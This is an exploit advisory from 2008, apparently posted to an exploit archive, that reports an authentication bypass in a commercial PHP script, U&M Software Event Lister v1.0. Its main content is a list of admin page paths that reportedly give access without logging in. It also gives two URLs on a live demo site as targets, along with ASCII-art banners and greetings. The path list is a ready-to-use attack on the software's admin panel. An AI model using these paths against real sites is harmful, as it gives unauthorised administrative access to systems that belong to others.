============================================================================== _ _ _ _ _ _ / \ | | | | / \ | | | | / _ \ | | | | / _ \ | |_| | / ___ \ | |___ | |___ / ___ \ | _ | IN THE NAME OF /_/ \_\ |_____| |_____| /_/ \_\ |_| |_| ============================================================================== ____ _ _ _ _ ___ _ __ / ___| | || | | \ | | / _ \ | |/ / | | _ | || |_ | \| | | | | | | ' / | |_| | |__ _| | |\ | | |_| | | . \ \____| |_| |_| \_| \___/ |_|\_\ ============================================================================== U&M Software Event Lister v1.0 Auth Bypass Vulnerability ============================================================================== [] Script: [ U&M Software Event Lister v1.0 ] [] Language: [ PHP ] [] Website: [ http://www.hotscripts.com/Detailed/84735.html ] [] Type: [ Commercial ] [] Report-Date: [ 06.11.2008 ] [] Founder: [ G4N0K <mail.ganok[at]gmail.com> ] ===[ XPL ]=== [!] Use one of these paths to bypass admin login ;) [] http://localhost/[path]/admin/start.php [] http://localhost/[path]/admin/aktivitet.php [] http://localhost/[path]/admin/prop_aktivitet.php [] http://localhost/[path]/admin/kategorier.php [] http://localhost/[path]/admin/konfig.php [] http://localhost/[path]/admin/security.php [] http://localhost/[path]/admin/manual.php ===[ LIVE ]=== [] http://www.justlistit.uochm.com/demo/admin/start.php [] http://www.justlistit.uochm.com/demo/admin/index.php ===[ Greetz ]=== [] ALLAH [] Tornado2800 <Tornado2800[at]gmail.com> [] Hussain-X <darkangel_g85[at]yahoo.com> //Are ya looking for something that has not BUGz at all...!? I know it... It's The Holy Quran. [:-) //ALLAH,forgimme... =============================================================================== exit(); //EoX ===============================================================================